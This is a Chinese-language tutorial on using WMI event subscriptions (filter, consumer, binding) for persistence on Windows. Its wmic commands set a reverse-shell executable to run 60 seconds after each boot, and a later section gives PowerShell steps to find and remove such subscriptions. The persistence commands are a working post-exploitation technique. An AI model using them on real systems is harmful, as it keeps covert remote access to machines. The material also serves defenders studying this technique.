一、WMI事件订阅机制简介
WMI(Windows Management Instrumentation,Windows管理规范)是windows提供的一种能够直接与系统进行交互的机制,旨在为系统中运行的各程序界定一套独立于环境的标准,允许系统中允许的程序相互交流系统的程序管理信息。
WMI事件是Windows管理架构中的一部分,它可以监视应用程序的运行、响应系统和应用程序的事件。通过使用WMI事件,应用程序可以接收系统各类通知,并且在特定事件发生时采取相应的措施。例如,磁盘空间不足时可以通过WMI事件来发出警报等。WMI事件可以通过编写WMI查询或使用WMI事件订阅API来捕获。
WMI事件订阅是一种消息机制,用来监听事件类的触发。简单来书,设置一个监听磁盘空间不足的事件订阅,程序可以在磁盘不足的第一时间接收到WMI的告警。事件订阅中有很多类,这里主要关注以下类:
类名 | 作用 |
---|---|
EventFilter | 触发器 |
EventConsumer | 执行动作 |
FilterToConsumerBinding | 绑定过滤器和消费者类(负责捆绑EventFilter和EventConsumer) |
二、利用事件订阅进行权限维持
1、WQL是一种类似SQL的查询语句,是WMI提供的一种用于WMI查询或WMI事件订阅的语句。在命令行中输入wbemtest
,打开Windows Management Instrumentation
测试器来通过WQL语句查询系统信息。
wbemtest
打开后进入一个命名空间,点击“连接”——“查询”。
使用WQL查询当前系统中所有进程的PID。
select * from Win32_Process
此外,还有其他查询语句。
# 获取主机名
select * from Win32_ComputerSystem
# 获取BOIS信息
select * from Win32_BOIS
# 获取键盘信息
select * from Win32_Keyboard
# 获取服务列表
select * from Win32_Service
# 获取磁盘列表
select * from Win32_LogicalDisk
# 获取光驱信息
select * from Win32_CDROMDriver
2、利用WMI通知查询的方式来监听windows打印机任务,选择“通知查询”。并使用如下WQL语句:
select * from __InstanceCreationEvent within 0.001 where TargetInstance ISA "Win32_PrintJob"
# __InstanceCreateEvent:代表windows事件类
# within 0.001:代表轮询时间,轮询时间为0.001s,可以理解为每毫秒查询一次该事件
# TargetInstance:实例名称
# ISA:等于
# Win32_PrintJob:打印机名称
3、我们可以将通知查询和执行动作进行捆绑,捆绑之后,系统触发某项查询规则时会立即执行对应动作。首先创建一个触发器,代码如下:
# 在系统初始化之后的第60秒将会进行通知
wmic /namespace:"\\root\subscription" PATH __EventFilter create Name="Testone",EventNameSpace="root\cimv2",Querylanguage="WQL",Query="select * from __InstanceModificationEvent within 60 where TargetInstance ISA "Win32_PerfFormattedData_PerfOS_SYSTEM""
# __EventFilter:触发器
# Testone:触发器名称
# 触发的通知条件由Query决定
# Win32_PerfFormattedData_PerfOS_SYSTEM:windows系统初始化
4、创建好触发器后,需要绑定一个对应的执行动作,也就是触发器在查询到想要的内容后就会触发绑定的执行动作。执行动作需要将命名空间指定为触发器所设置的命名空间,创建执行动作可以使用EventConsumer
来完成。当然,需要生成反弹shell,设置监听器哈!
# 当Testone时间被触发后,C:\tmp\reverse_shell.exe将会被执行
wmic /namespace:"\\root\subscription" PATH CommandLineEventConsumer create Name="Testone",ExecutablePath="C:\tmp\reverse_shell.exe",CommandLineTemplate="C:\tmp\reverse_shell.exe"
5、使用FilterToConsumerBinding
来绑定刚刚所创建的触发器和执行动作。
# 绑定触发器和执行动作
wmic /namespace:"\\root\subscription" PATH __FilterToConsumerBinding create Filter="__EventFilter.Name=\"Testone\"",Consumer="CommandLineEventConsumer.Name=\"Testone\""
6、重启计算,在系统进行初始化工作(重启/重新登录)的第60秒,获取反弹shell。
三、防御方式
# 查询系统所有命名空间
Get-WmiObject -Namespace root -List -Recurse | Select -Unique __NAMESPACE
# 查询root\subscription命名空间中是否存在执行恶意命令的触发器
Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer | select CommandLineTemplate,ExecutablePath
# 列出事件过滤器
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
# 列出事件消费者
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
# 列出事件绑定
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
# 删除事件过滤器
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='Testone'" | Remove-WmiObject -Verbose
# 删除事件消费者
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='Testone'" | Remove-WmiObject -Verbose
# 删除事件绑定
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%Testone%'" | Remove-WmiObject -Verbose
# 查询root\subscription命名空间中是否存在执行恶意命令的触发器
Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer | select CommandLineTemplate,ExecutablePath
至此,系统初始化后的第60s,不会运行反弹shell脚本。